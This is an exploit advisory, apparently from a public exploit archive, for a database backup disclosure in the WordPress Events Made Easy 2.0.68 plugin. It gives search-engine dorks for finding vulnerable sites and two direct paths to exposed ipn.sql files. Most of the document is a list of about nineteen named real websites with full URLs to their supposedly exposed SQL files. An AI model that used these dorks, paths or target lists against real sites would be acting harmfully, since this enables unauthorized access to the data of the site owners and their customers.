WordPress Events Made Easy 2.0.68 Database Disclosure

WordPress Events Made Easy plugin version 2.0.68 suffers from a database disclosure vulnerability.


MD5 | 64595d32b5aeeb02eb9827ef3bc9e0d3

#################################################################################################

# Exploit Title : WordPress Events Made Easy Plugins 2.0.68 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 06/12/2018
# Vendor Homepage : wordpress.org/plugins/events-made-easy/
# Software Download Link :
downloads.wordpress.org/plugin/events-made-easy.2.0.68.zip
+ github.com/wp-plugins/events-made-easy/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.0.68
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/events-made-easy/''
intext:''Designed by www.diablodesign.eu.''
intext:''Powered by WordPress , Designed and Developed by templatesnext''
intext:''Copyright : Acole les Saints Anges''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/events-made-easy/paypal/scripts/ipn.sql

/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

#################################################################################################

# Example Vulnerable Sites =>

[+]
triskelartscentre.ie/content/wp-content/plugins/events-made-easy/paypal/scripts/ipn.sql

[+]
sites.nd.edu/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
njad.ca/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
affordablelifeandhealthcare.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
storefront.iamcostumecrazee.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
tworiversuu.org/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
rokietnica.nazwa.pl/newpage/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
worldsingingday.com.au/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
fpvrace28.fr/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql


[+]
grasdalungdomshus.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
chunghuaserembanalumni.org/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
angliiskiezik.bg/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
bostonediscovery.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
brno-cernovice.cz/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
ulkus.ch/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
diepartei-koblenz.de/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
lessaintsanges.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
meircsa.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

[+]
ruslanogorodnik.com/lr-travellers/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts